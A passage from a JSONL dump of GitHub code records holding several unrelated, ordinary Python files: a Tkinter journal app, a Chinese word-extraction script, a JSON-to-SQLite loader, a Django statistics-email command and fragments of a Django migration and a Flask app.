('gestor', models.ForeignKey(to='gestor.Gestor')),\n ],\n ),\n migrations.CreateModel(\n name='Modulo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('descripcion', 
models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Valor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('valor', models.BigIntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='evidencia',\n name='modulo',\n field=models.ForeignKey(to='acceso.Modulo'),\n ),\n migrations.AddField(\n model_name='evidencia',\n name='radicado',\n field=models.ForeignKey(to='radicado.Radicado'),\n ),\n migrations.AddField(\n model_name='evidencia',\n name='valor',\n field=models.ForeignKey(to='acceso.Valor'),\n ),\n ]\n","repo_name":"Dandresfsoto/Andes","sub_path":"acceso/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34379371532","text":"import os, sys, csv\n\nimport datafetch\nfrom segmenterhelper import SegmenterHelper, RachelsCategories\nfrom config import Config\n\nNUM_NEW_WORDS_PER_RUN = 20\nINPUT_FILE_PATH = os.path.expanduser(\"/tmp/corpus.txt\")\nOUTPUT_FILE_PATH = os.path.expanduser(\"~/Desktop/out.tsv\")\nCONFIG_FILE_PATH = \"config.db\"\n\ndef dedupe_and_dump_results(segHelper):\n try:\n all_words = set()\n\n if os.path.exists(OUTPUT_FILE_PATH):\n print (\"Found existing wordlist file, reading list...\")\n with open(OUTPUT_FILE_PATH, 'r+') as tsvfile:\n reader = csv.DictReader(tsvfile, dialect='excel-tab')\n for row in reader:\n all_words.add(row[\"original_word\"])\n\n with open(OUTPUT_FILE_PATH, 'a+') as tsvfile:\n if len(all_words) == 0:\n print (\"Starting new word list file...\")\n tsvfile.write(RachelsCategories.csv_header)\n\n new_words = []\n\n print(\"Deduping wordlists, writing to file...\")\n for word in segHelper.results:\n if word.orig_word not in all_words:\n new_words.append(word)\n\n if len(new_words) == NUM_NEW_WORDS_PER_RUN:\n break\n\n tsvfile.write(\"\\n\")\n results = '\\n'.join([str(x) for x in new_words])\n tsvfile.write(results)\n except (OSError, IOError) as e:\n print(\"Warning: Failed to write to output file {}: {}\".format(OUTPUT_FILE_PATH, e))\n \ndef main():\n # Fetch Chinese text and write to input file\n print(\"NYT Chinese Word Extractor\\nBy Ephraim Kunz\\n\\n\")\n\n print(\"Fetching text from cn.nytimes.com...\")\n text = datafetch.get_concatenated_text()\n\n print(\"Writing fetched text to temporary file...\")\n with open(INPUT_FILE_PATH, 'w+') as input_file:\n input_file.write(text)\n\n # Build SegmenterHelper\n print(\"Loading configurations, dictionaries, wordlists...\")\n runningDir=os.path.dirname(os.path.abspath(__file__))\n segHelper = SegmenterHelper(runningDir)\n\n # Run the segmenter\n config = Config(str(os.path.abspath(CONFIG_FILE_PATH)))\n config.appDir = segHelper.runningDir\n\n segHelper.config = config\n segHelper.LoadData()\n segHelper.LoadKnownWords()\n segHelper.LoadExtraColumns()\n\n print(\"Reading fetched text from temporary file...\")\n segHelper.ReadFiles( [INPUT_FILE_PATH])\n\n segHelper.SummarizeResults()\n\n print(\"\\n\")\n print(segHelper.summary)\n\n # Dedup words and write new output file\n print(\"Deduping results and dumping new wordlist file...\")\n dedupe_and_dump_results(segHelper)\n\n print(\"Done! 
Output file written to {}\".format(OUTPUT_FILE_PATH))\n\n input(\"Press enter to exit...\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"ephraimkunz/NYTChinese","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37972243026","text":"from django import forms\n\nfrom .models import AlgoTask\n\n\nclass TaskForm(forms.ModelForm):\n class Meta:\n model = AlgoTask\n fields = [\"a\", \"h\", \"r\", \"m\"]\n\n labels = {\n \"a\": \"Сторона куба\",\n \"h\": \"Высота цилиндра\",\n \"r\": \"Радиус основания цилиндра\",\n \"m\": \"Объем жидкости\",\n }\n","repo_name":"yulachi/cats-fun-site","sub_path":"algo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9662922478","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 20 15:00:50 2016\n\n@author: Kozmik\n\"\"\"\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.messagebox as messagebox\nfrom JObject import JEntry\nfrom BodyModule import BodyFrame\nfrom TagsModule import TagsFrame\nfrom Storage import Storage\nfrom DateModule import DateFrame\nfrom os.path import join\nfrom GraphTools import JGraph\nfrom AttachmentTools import AttachmentManager\n\n\nclass Main(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n style = JournalStyle()\n style.setNightStyle()\n self.attributes('-fullscreen', False)\n self.args = style.getCustomValues()\n w, h = self.winfo_screenwidth(), self.winfo_screenheight()\n self.geometry(\"%dx%d+0+0\" % (w*0.995, h*.87))\n self.config(bg=self.args['bgcolor1'])\n# self.overrideredirect(1)\n self.title('kunnekted-jurnl')\n\n self.storage = Storage()\n self.args['homepath'] = self.storage.getPath()\n iconpath = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.iconbitmap(iconpath)\n messagepath = (join(self.args['homepath'], 'Resources\\\\Messages'))\n messagefile = open(messagepath)\n self.messages = messagefile.read()\n self.journal = self.storage.getJournal()\n self.entry = JEntry()\n \n self.backup_interval_var = self.storage.getBackupIntervalVar()\n self.journal_auto_save = self.storage.getAutosaveVar()\n self.last_backup_var = self.storage.getLastBackupVar()\n self.fullscreen_var = self.storage.get_fullscreen_var()\n\n self.short_message_var = tk.StringVar(name='Message', value='')\n \n \"\"\"Frame 1\"\"\"\n frame1 = ttk.Frame(self)\n frame1_1 = ttk.Frame(frame1)\n self.date_frame = DateFrame(frame1_1, self.entry, self.journal, \n self, width=100, **self.args)\n frame1_3 = ttk.Frame(frame1)\n self.LAST_BACKUP_LABEL = ttk.Label(frame1_3, text='Last Backup: ')\n self.LAST_BACKUP = ttk.Label(frame1_3, \n textvariable=self.last_backup_var)\n self.MESSAGE = ttk.Label(frame1_3, textvariable=self.short_message_var)\n # self.LAST_BACKUP.pack(side='right', padx=3)\n # self.LAST_BACKUP_LABEL.pack(side='right')\n # self.MESSAGE.pack(side='bottom')\n self.LAST_BACKUP.grid(row=0, column=1)\n self.LAST_BACKUP_LABEL.grid(row=0, column=0)\n self.MESSAGE.grid(row=1, column=1, sticky='se')\n frame1_1.grid(row=0, column=0, sticky='w')\n self.date_frame.grid(row=1, column=0, padx=self.args['padx'], sticky='w')\n frame1_3.grid(row=0, column=2)\n frame1.grid_columnconfigure(0, weight=1)\n frame1.grid_columnconfigure(1, weight=2)\n frame1.grid_columnconfigure(2, weight=0)\n frame1.pack(side='top', expand=True, fill='x', 
padx=self.args['padx'])\n \n \"\"\"Frame 2\"\"\"\n frame2 = ttk.Frame(self)\n self.body_frame = BodyFrame(frame2, self.entry, **self.args)\n self.tags_frame = TagsFrame(frame2, self.journal, self.entry, **self.args)\n self.body_frame.pack(side='top', expand=True, fill='both', \n padx=self.args['padx'], pady=self.args['pady'])\n self.tags_frame.pack(side='top', expand=True, fill='x', \n padx=self.args['padx'], pady=self.args['pady'])\n frame2.pack(side='top', expand=True, fill='x', padx=self.args['padx'], \n pady=self.args['pady'])\n \n \"\"\"Frame 3\"\"\"\n frame3 = ttk.Frame(self)\n frame3_1 = ttk.Frame(frame3)\n self.options_frame = ttk.Frame(frame3, relief=self.args['relief'], \n border=self.args['border'])\n frame3_3 = ttk.Frame(frame3)\n self.jgraph = JGraph(self.options_frame, self, self.journal, \n self.entry, **self.args)\n self.attachmanager = AttachmentManager(self.options_frame, self, self.journal, \n self.entry, **self.args) \n frame3_1.pack(side='left', expand=True, fill='x')\n self.options_frame.pack(side='left', pady=self.args['pady'])\n frame3_3.pack(side='left', expand=True, fill='x')\n frame3.pack(side='top', expand=True, fill='x', padx=self.args['padx'])\n self.SAVE = ttk.Button(self.options_frame, takefocus=0, text=\"Save\", \n command=self.save)\n self.SAVE.grid(row=0, column=0)\n self.NEW = ttk.Button(self.options_frame, takefocus=0, text=\"New Entry\", \n command=self.newEntry)\n self.NEW.grid(row=0, column=6)\n self.QUIT = ttk.Button(self.options_frame, takefocus=0, text=\"Quit\", \n command=self.destroyApp)\n self.QUIT.grid(row=1, column=0)\n self.DELETE = ttk.Button(self.options_frame, takefocus=0, text=\"Delete\", \n command=self.delete)\n self.DELETE.grid(row=1, column=6)\n self.jgraph.grid(row=0, column=2, rowspan=2)\n self.attachmanager.grid(row=0, column=4, rowspan=2)\n \n \"\"\"Menu\"\"\"\n menubutton = ttk.Menubutton(frame1_1, text='Options')\n menubar = tk.Menu(menubutton, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n menubutton.config(menu=menubar)\n \n journal_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n journal_menu.add_command(label='Save All Changes', \n command=self.writeToDatabase)\n app_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n# app_pref_menu = tk.Menu(app_menu, bg=self.args['bgcolor1'], \n# fg=self.args['textcolor1'], tearoff=0)\n theme_menu = tk.Menu(app_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n theme_menu.add_command(label='Light Theme (WIP)', command=style.setDayStyle)\n theme_menu.add_command(label='Dark Theme', command=style.setNightStyle)\n# app_menu.add_cascade(label='App Preferences', menu=app_pref_menu)\n app_menu.add_cascade(label='Theme', menu=theme_menu)\n app_menu.add_command(label='Toggle Fullscreen', command=self.toggle_full_screen)\n pref_menu = tk.Menu(journal_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n journal_menu.add_cascade(label='Database Preferences', menu=pref_menu)\n \n entry_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n entry_menu.add_command(label='Save', command=self.save)\n entry_menu.add_command(label='Delete', command=self.delete)\n pref_menu.add_command(label=\"Change Save Directory\", \n command=self.storage.changeSaveDirectory)\n backup_menu = tk.Menu(pref_menu, 
bg=self.args['bgcolor1'], \r\n                              fg=self.args['textcolor1'], tearoff=0, \r\n                              selectcolor=self.args['arrow'])\r\n        backup_menu.add_command(label='Change Backup Directory', \r\n                                command=self.storage.changeBackupDirectory)\r\n        self.interval_menu = tk.Menu(backup_menu, bg=self.args['bgcolor1'], \r\n                                     fg=self.args['textcolor1'], tearoff=0, \r\n                                     selectcolor=self.args['arrow'])\r\n        self.interval_menu.add_command(label='Immediately', \r\n                                       command=self.storage.backupDatabase)\r\n        self.interval_menu.add_radiobutton(label='Day', \r\n                                           var=self.backup_interval_var, \r\n                                           value=24, \r\n                                           command=self.storage.changeBackupSchedule)\r\n        self.interval_menu.add_radiobutton(label='3 Days', \r\n                                           var=self.backup_interval_var, \r\n                                           value=72, \r\n                                           command=self.storage.changeBackupSchedule)\r\n        self.interval_menu.add_radiobutton(label='Week', \r\n                                           var=self.backup_interval_var, \r\n                                           value=168, \r\n                                           command=self.storage.changeBackupSchedule)\r\n        self.interval_menu.add_radiobutton(label='Never', \r\n                                           var=self.backup_interval_var, \r\n                                           value=-1, \r\n                                           command=self.storage.changeBackupSchedule)\r\n\r\n        backup_menu.add_cascade(label='Backup Database Every...', \r\n                                menu=self.interval_menu)\r\n        pref_menu.add_cascade(label='Backup Options', menu=backup_menu)\r\n        pref_menu.add_command(label=\"Change Imports Directory\", \r\n                              command=self.storage.changeImportsDirectory)\r\n\r\n        help_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], fg=self.args['textcolor1'], \r\n                            tearoff=0, selectcolor=self.args['arrow'])\r\n        help_menu.add_command(label='Help', command=self.createHelpWindow)\r\n        help_menu.add_command(label='Keyboard Shortcuts', \r\n                              command=self.createShortcutsWindow)\r\n        help_menu.add_command(label=\"About\", command=self.createAboutWindow)\r\n        \r\n        menubar.add_cascade(label='App', menu=app_menu)\r\n        menubar.add_cascade(label='Journal', menu=journal_menu)\r\n        menubar.add_cascade(label=\"Entry\", menu=entry_menu)\r\n        menubar.add_cascade(label=\"Help\", menu=help_menu)\r\n        menubar.add_command(label='Quit', command=self.destroyApp)\r\n        self.config(menu=menubutton)\r\n        menubar.config(bg=self.args['bgcolor1'], fg=self.args['textcolor1'])\r\n        menubutton.grid(row=0, column=0, sticky='w', pady=self.args['pady'])\r\n        \r\n        self.protocol(\"WM_DELETE_WINDOW\", self.destroyApp)\r\n        self.bindDateControl()\r\n        self.updateGUI(entry=self.entry)\r\n        if self.storage.getFirstTimeVar().get():\r\n            self.createWelcomeWindow()\r\n            self.storage.changeFirstTimeFlag()\r\n        if self.fullscreen_var.get():\r\n            self.attributes('-fullscreen', True)\r\n    \r\n    # NOTE: the original section markers for the Messages file were lost in extraction;\r\n    # the '<welcome>'/'<shortcuts>'/'<help>'/'<about>' tags below are assumed placeholders\r\n    def createWelcomeWindow(self):\r\n        self.createWindow('Welcome!', self.messages.split('<welcome>')[1], \r\n                          (500, 500))\r\n    \r\n    def createShortcutsWindow(self):\r\n        self.createWindow('Shortcuts', self.messages.split('<shortcuts>')[1], \r\n                          (500, 500))\r\n    \r\n    def createHelpWindow(self):\r\n        self.createWindow('Help', self.messages.split('<help>')[1], (300, 500))\r\n    \r\n    def createAboutWindow(self):\r\n        self.createWindow('About', self.messages.split('<about>')[1], \r\n                          (200, 300))\r\n    \r\n    def createWindow(self, title, message, dims):\r\n        main = tk.Toplevel(bg=self.args['bgcolor1'])\r\n        main.title(title)\r\n        main.iconbitmap(join(self.args['homepath'], 'Resources\\\\web.ico'))\r\n        outerframe = ttk.Frame(main)\r\n        frame = ttk.Frame(outerframe)\r\n        ybar = ttk.Scrollbar(frame)\r\n        text=tk.Text(frame, yscrollcommand=ybar.set, \r\n                     wrap='word', font='TkMenuFont', bg=self.args['bgcolor1'], \r\n                     fg=self.args['textcolor1'])\r\n        ybar.config(command=text.yview)\r\n        text.insert('insert', message)\r\n        text.config(state='disabled')\r\n        text.pack(side='left', fill='both', expand=True)\r\n        ybar.pack(side='left', fill='y', expand=False, anchor='w')\r\n        frame.pack(side='left', fill='both', expand=True, anchor='e', padx=3)\r\n        
outerframe.pack(expand=True, fill='both')\n main.focus_force()\n main.grab_set()\n \n def destroyApp(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.attachmanager.clean()\n self.storage.saveJournal(self.journal)\n self.storage.save_ini_file()\n self.destroy()\n\n def toggle_full_screen(self):\n v = self.attributes('-fullscreen')\n if v:\n v = False\n else:\n v = True\n self.attributes('-fullscreen', v)\n self.storage.change_fullscreen_flag(v)\n\n def changeAutoSavePref(self):\n self.storage.toggleAutoSave()\n if self.journal_auto_save.get():\n message = 'Journal autosave is ON.'\n else:\n message = 'Journal autosave is OFF'\n messagebox.showinfo(title='Autosave', message=message)\n \n def updateGUI(self, event=None, entry=None):\n if not self.body_frame.bodyFieldIsEmpty(): # and not self.date_frame.getDate():\n self.save()\n date = self.date_frame.indexDate()\n if entry:\n self.entry = entry\n elif date:\n self.entry = self.journal.getEntry(date)\n else:\n self.entry = JEntry()\n self.date_frame.updateGUI(self.entry)\n self.body_frame.updateGUI(self.entry)\n self.tags_frame.updateGUI(self.entry)\n self.attachmanager.updateGUI(self.entry)\n self.jgraph.updateGUI(self.entry)\n self.body_frame.grabFocus()\n \n def clearGUI(self):\n self.entry = JEntry()\n self.date_frame.clearGUI(self.entry)\n self.body_frame.clearGUI(self.entry)\n self.tags_frame.clearGUI(self.entry)\n self.attachmanager.clearGUI(self.entry)\n self.jgraph.clearGUI(self.entry)\n self.body_frame.grabFocus()\n\n def clear_short_message(self):\n self.short_message_var.set('')\n \n def bindDateControl(self):\n self.date_frame.bindDatebox(self.updateGUI)\n \n def save(self):\n self.date_frame.save()\n self.body_frame.save()\n self.tags_frame.save()\n self.attachmanager.save()\n if self.entry.getParent():\n date = self.entry.getParent()\n parent = self.journal.getEntry(date)\n parent.linkChild(self.entry.getDate())\n self.jgraph.updateGUI(self.entry)\n self.journal.add(self.entry)\n self.short_message_var.set('Saved')\n self.after(3500, self.clear_short_message)\n \n def writeToDatabase(self):\n self.save()\n self.storage.saveJournal(self.journal)\n \n def delete(self):\n date = self.entry.getDate()\n if not date:\n self.clearGUI()\n else:\n selection = messagebox.askyesno(\"Delete Entry\", \"Delete this entry?\")\n if selection:\n self.jgraph.deleteEntry(self.entry.getDate())\n self.journal.delete(self.entry)\n self.attachmanager.delete()\n self.clearGUI()\n \n def newEntry(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.updateGUI(entry=JEntry())\n \n def newLink(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.updateGUI(entry=JEntry(parent=self.entry.getDate(), \n tags=self.entry.getTags()))\n \nclass JournalStyle(ttk.Style):\n def __init__(self):\n ttk.Style.__init__(self)\n self.tk_widgets = []\n self.bgcolor1 = None\n self.bgcolor2 = None\n self.text_color1 = None\n self.text_color2 = None\n self.text_color3 = None\n self.frame_borderwidth = 4\n self.padx = 5\n self.pady = 3\n self.frame_relief = 'groove'\n self.theme_create('shadow', parent='default')\n self.theme_settings('shadow', {\n 'TButton': {\n 'configure': {'padding': 3, 'foreground': 'white', 'relief': 'raised',\n 'font': 'TkDefaultFont', 'background': 'black', \n 'anchor': 'center', 'borderwidth': 4, 'width': 20},\n 'map': {'foreground': [('disabled', 'gray40'), ('pressed', 'white'), \n ('active', 'white')],\n 
'background': [('disabled', 'black'), ('pressed', 'gray20'), \n ('active', 'gray10')],\n 'relief': [('pressed', 'groove'), ('!pressed', 'raised')]}},\n 'TLabel': {\n 'configure': {'background': 'black', 'foreground': 'white'}},\n 'TCombobox': {\n 'configure': {'fieldbackground': 'gray10', 'arrowcolor': 'gray50',\n 'background': 'black'},\n 'map': {'focusfill': [('readonly', 'focus', 'SystemHighlight')], \n 'foreground': [('disabled', 'SystemGrayText'), \n ('readonly', 'focus', 'black')], \n 'selectforeground': [('readonly', 'white')], \n 'selectbackground': [('readonly', 'gray10')]}},\n 'TCheckbutton': {\n 'configure': {'foreground': 'white', 'background': 'black', \n 'font': ('TkDefaultFont','10'), 'indicatorcolor': 'black'},\n 'map': {'indicatorcolor': [('pressed', 'white'), ('selected', 'blue')]}},\n 'TRadiobutton': {\n 'configure': {'foreground': 'white', 'background': 'black', \n 'indicatorcolor': 'black', 'padding': 3},\n 'map': {'indicatorcolor': [('pressed', 'white'), ('selected', 'blue')]}},\n 'Vertical.TScrollbar': {\n 'configure': {'background': 'black', 'troughcolor': 'gray30', 'arrowcolor': 'white'}},\n 'Horizontal.TScrollbar': {\n 'configure': {'background': 'black', 'troughcolor': 'gray30', 'arrowcolor': 'white'}},\n 'UI.TButton': {\n 'configure': {}},\n 'Current.UI.TButton': {\n 'configure': {'background': 'black', 'foreground': 'DeepSkyBlue2'},\n 'map': {'foreground': [('active', 'DeepSkyBlue2')]}},\n 'Bold.UI.TButton': {\n 'configure': {'font': ('TkDefault', '9', 'bold')}},\n 'Tags.Bold.UI.TButton': {\n 'configure':{'font': ('TkDefault', '9', 'bold', 'underline')}},\n 'Tags.Variable.UI.TButton': {\n 'configure': ''},\n 'TFrame': {\n 'configure': {'background': 'black'}},\n 'TMenubutton': {\n 'configure': {'background': 'black', 'foreground': 'white',\n 'indicator': 'red'}}\n })\n \n self.theme_create('daylight', 'shadow')\n self.theme_settings('daylight', {\n 'TButton': {\n 'configure': {'padding': 3, 'foreground': 'black', 'relief': 'raised',\n 'font': 'TkDefaultFont', 'background': 'white', \n 'anchor': 'center', 'borderwidth': 4, 'width': 20},\n 'map': {'foreground': [('disabled', 'gray40'), ('pressed', 'black'), \n ('active', 'black')],\n 'background': [('disabled', 'light grey'), ('pressed', 'white smoke'), \n ('active', 'azure')],\n 'relief': [('pressed', 'groove'), ('!pressed', 'raised')]}},\n 'TLabel': {\n 'configure': {'background': 'white', 'foreground': 'black'}},\n 'TCombobox': {\n 'configure': {'fieldbackground': 'gray70', 'arrowcolor': 'gray50',\n 'background': 'gray'},\n 'map': {'focusfill': [('readonly', 'focus', 'SystemHighlight')], \n 'foreground': [('disabled', 'SystemGrayText'), \n ('readonly', 'focus', 'black')], \n 'selectforeground': [('readonly', 'black')], \n 'selectbackground': [('readonly', 'gray70')]}},\n 'TCheckbutton': {\n 'configure': {'foreground': 'black', 'background': 'white', \n 'font': ('TkDefaultFont','10'), 'indicatorcolor': 'black'},\n 'map': {'indicatorcolor': [('pressed', 'gray'), ('selected', 'blue')]}},\n 'TRadiobutton': {\n 'configure': {'foreground': 'black', 'background': 'white', \n 'indicatorcolor': 'black', 'padding': 3},\n 'map': {'indicatorcolor': [('pressed', 'gray'), ('selected', 'blue')]}},\n 'Vertical.TScrollbar': {\n 'configure': {'background': 'white', 'troughcolor': 'gray70', 'arrowcolor': 'gray50'}},\n 'Horizontal.TScrollbar': {\n 'configure': {'background': 'white', 'troughcolor': 'gray70', 'arrowcolor': 'gray50'}},\n 'UI.TButton': {\n 'configure': {}},\n 'Current.UI.TButton': {\n 'configure': {'background': 
'white', 'foreground': 'blue'},\r\n                'map': {'foreground': [('active', 'blue')]}},\r\n            'Bold.UI.TButton': {\r\n                'configure': {'font': ('TkDefault', '9', 'bold')}},\r\n            'Tags.Bold.UI.TButton': {\r\n                'configure':{'font': ('TkDefault', '9', 'bold', 'underline')}},\r\n            'Tags.Variable.UI.TButton': {\r\n                'configure': ''},\r\n            'TFrame': {\r\n                'configure': {'background': 'white'}},\r\n            'TMenubutton': {\r\n                'configure': {'background': 'white', 'foreground': 'black',\r\n                              'indicator': 'red'}}\r\n            })\r\n        \r\n    def setDayStyle(self):\r\n        self.theme_use('daylight')\r\n        textcolors = {'1': 'black', '2': 'black', '3': 'blue'}\r\n        bgcolors = {'1': 'gray70', '2': 'gray90'}\r\n        self.setTkBGColors(bgcolors)\r\n        self.setTkTextColors(textcolors)\r\n        \r\n    def setNightStyle(self):\r\n        self.theme_use('shadow')\r\n        textcolors = {'1': 'white', '2': 'lime green', '3': 'DeepSkyBlue2'}\r\n        bgcolors = {'1': 'black', '2': 'gray8'}\r\n        self.setTkBGColors(bgcolors)\r\n        self.setTkTextColors(textcolors)\r\n        \r\n    def setTkBGColors(self, kw):\r\n        self.bgcolor1 = kw['1']\r\n        self.bgcolor2 = kw['2']\r\n        \r\n    def setTkTextColors(self, kw):\r\n        self.text_color1 = kw['1']\r\n        self.text_color2 = kw['2']\r\n        self.text_color3 = kw['3']\r\n        \r\n    def getCustomValues(self):\r\n        return {'relief': self.frame_relief, 'border': self.frame_borderwidth, \r\n                'bgcolor1': self.bgcolor1, 'bgcolor2': self.bgcolor2, \r\n                'textcolor1': self.text_color1, 'textcolor2': self.text_color2, \r\n                'textcolor3': self.text_color3, 'padx': self.padx, \r\n                'pady': self.pady, 'arrow': self.text_color1}\r\n        \r\n    def toggleTheme(self):\r\n        if self.theme_use() == 'daylight':\r\n            self.setNightStyle()\r\n        else:\r\n            self.setDayStyle()\r\n        \r\n    def addWidget(self, wid):\r\n        self.tk_widgets.append(wid)\r\n    \r\n    \r\napp = Main()\r\napp.mainloop()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"Journal.py","file_name":"Journal.py","file_ext":"py","file_size_in_byte":24276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11181438201","text":"import sqlite3\nimport simplejson as json\nimport datetime\n\n# Create the DB\n# for desktop\nconn = sqlite3.connect('C:/python_Webcroling/section5/databases/sqlite_homework.db') #isolation_level=None : Auto Commit\n# Build the date string\nnow = datetime.datetime.now()\nnowDatetime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nc = conn.cursor()\nc.execute('CREATE TABLE IF NOT EXISTS photos(albumId INTEGER, id text, title text, url text, thumbnailUrl text, regdate text)')\n\nwith open('C:/python_Webcroling/section5/data/photos.json', 'r') as infile:\n    r = json.load(infile)\n    photoDate = []\n    for photo in r:\n        t = (photo['albumId'],photo['id'],photo['title'],photo['url'],photo['thumbnailUrl'],nowDatetime)\n        print(t)\n        photoDate.append(t)\n    c.executemany(\"INSERT INTO photos(albumId, id, title, url, thumbnailUrl, regdate) VALUES (?,?,?,?,?,?)\", tuple(photoDate))\n\nconn.commit()\n","repo_name":"wnstlddl/-webcrolling_section5","sub_path":"5-homework2.py","file_name":"5-homework2.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21877596425","text":"import json\nimport os\nimport textwrap\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.conf import settings\nfrom django.contrib.humanize.templatetags.humanize import intword\nfrom django.core.mail import send_mail\nfrom django.core.management.base import BaseCommand\nfrom django.db.models.aggregates import Sum\nfrom django.utils import timezone\n\nfrom users.models import User\n\nfrom ...models import Win, CustomerResponse\n\n\nclass 
Command(BaseCommand):\n    \"\"\" Emails stats of Wins and Users to date (optional JSON) \"\"\"\n\n    def add_arguments(self, parser):\n        parser.add_argument(\n            \"--json\",\n            action=\"store_true\",\n            help=\"Output the statistics in JSON format.\"\n        )\n        parser.add_argument(\n            \"--show-all\",\n            action=\"store_true\",\n            help=\"Don't exclude staff users.\"\n        )\n\n    def handle(self, *args, **options):\n\n        wins = Win.objects.all()\n        confirmations = CustomerResponse.objects.all()\n        users = User.objects.all()\n        one_week_ago = timezone.now() - relativedelta(weeks=1)\n\n        stats = {\n            \"wins\": {\n                \"total\": wins.count(),\n                \"total-export-funds\": wins.aggregate(\n                    total=Sum(\"total_expected_export_value\"))[\"total\"],\n                \"total-non-export-funds\": wins.aggregate(\n                    total=Sum(\"total_expected_non_export_value\"))[\"total\"],\n                \"confirmed\": confirmations.count(),\n                \"total-confirmed-export-funds\": wins.filter(confirmation__isnull=False).aggregate(\n                    total=Sum(\"total_expected_export_value\"))[\"total\"],\n                \"total-confirmed-non-export-funds\": wins.filter(confirmation__isnull=False).aggregate(\n                    total=Sum(\"total_expected_non_export_value\"))[\"total\"],\n\n            },\n            \"users\": {\n                \"total-active\": users.filter(\n                    last_login__gt=one_week_ago).count(),\n                \"total-creating-wins\": users.exclude(\n                    wins__isnull=True).distinct().count(),\n                \"total\": users.count(),\n            }\n        }\n\n        if options[\"json\"]:\n            return self._handle_json(stats)\n\n        stats_txt = self._generate_txt(stats)\n        send_to_addresses = os.getenv(\"STATS_EMAILS\").split(',')\n\n        send_mail(\n            \"Export Wins statistics\",\n            stats_txt,\n            settings.SENDING_ADDRESS,\n            send_to_addresses,\n        )\n\n\n    def _generate_txt(self, stats):\n        wins = stats[\"wins\"]\n        users = stats[\"users\"]\n        stats_txt = \"\"\"\n        Export Wins input by officers:\n\n        Total wins generated: {}\n        Total expected export value: {}\n        Total expected non-export value: {}\n\n\n        -----\n\n\n        Export wins customers have responded to:\n\n        Total wins responded to: {}\n        Total expected export value: {}\n        Total expected non export value: {}\n\n\n        -----\n\n\n        Users (officers):\n\n        Total logged in last week: {}\n        Total who have submitted wins: {}\n        Total who have been issued password: {}\n\n        \"\"\".format(\n            wins[\"total\"],\n            \"£{}\".format(intword(wins[\"total-export-funds\"])),\n            \"£{}\".format(intword(wins[\"total-non-export-funds\"])),\n            wins[\"confirmed\"],\n            \"£{}\".format(intword(wins[\"total-confirmed-export-funds\"])),\n            \"£{}\".format(intword(wins[\"total-confirmed-non-export-funds\"])),\n            users[\"total-active\"],\n            users[\"total-creating-wins\"],\n            users[\"total\"]\n        )\n        return textwrap.dedent(stats_txt)\n\n    @staticmethod\n    def _handle_json(stats):\n        return json.dumps(stats, separators=(\",\", \":\"))\n","repo_name":"adamchainz/export-wins-backend","sub_path":"wins/management/commands/win_statistics.py","file_name":"win_statistics.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27277378792","text":"from flask import Flask, render_template, request\nfrom werkzeug.utils import secure_filename\nimport os\n\napp = Flask(__name__)\n\n@app.route('/end', methods = ['GET', 'POST'])\ndef end_again():\n    if request.method == 'POST':\n        option = request.form['correct']\n        if os.path.isfile(\"./records/record.txt\"):\n            f = open(\"./records/record.txt\", \"a\")\n        else:\n            f = open(\"./records/record.txt\", \"w\")\n        if option == 'yes':\n            f.write('1')\n            f.close()\n            return \"Thank you!\" + render_template('end.html')\n        
